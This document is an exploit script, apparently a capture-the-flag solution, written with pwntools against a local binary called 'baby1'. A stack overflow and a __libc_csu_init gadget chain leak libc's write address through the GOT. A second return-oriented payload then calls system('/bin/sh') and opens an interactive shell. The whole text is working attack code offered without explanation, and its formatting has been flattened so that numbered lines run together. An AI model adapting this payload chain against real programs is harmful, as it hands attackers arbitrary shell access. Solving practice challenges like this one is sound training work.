1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51
| r = process('./baby1')
e = ELF('./baby1', checksec=False) libc = e.libc
pr = 0x4006c3 csu_init1 = 0x4006B6 csu_init2 = 0x4006A0 main_addr = e.symbols['main'] write_got = e.got['write'] write_os = libc.symbols['write'] read_got = e.got['read'] system_os = libc.symbols['system'] binsh_os = libc.search('/bin/sh').next() libc_start = e.got['__libc_start_main']
payload = "" payload += 'A'*56 payload += p64(csu_init1) payload += "A"*8 payload += p64(0) payload += p64(1) payload += p64(write_got) payload += p64(8) payload += p64(write_got) payload += p64(1)
payload += p64(csu_init2) payload += p64(0) payload += p64(0) payload += p64(0) payload += p64(0) payload += p64(0) payload += p64(0) payload += p64(0) payload += p64(main_addr) r.recvline() r.sendline(payload)
leaked = u64(r.recv(6).ljust(8, '\x00')) libc_base = leaked - write_os system_addr = libc_base + system_os binsh_addr = libc_base + binsh_os
payload = "" payload += 'A'*56 payload += p64(pr) payload += p64(binsh_addr) payload += p64(system_addr) r.sendlineafter("\n", payload) r.interactive()
|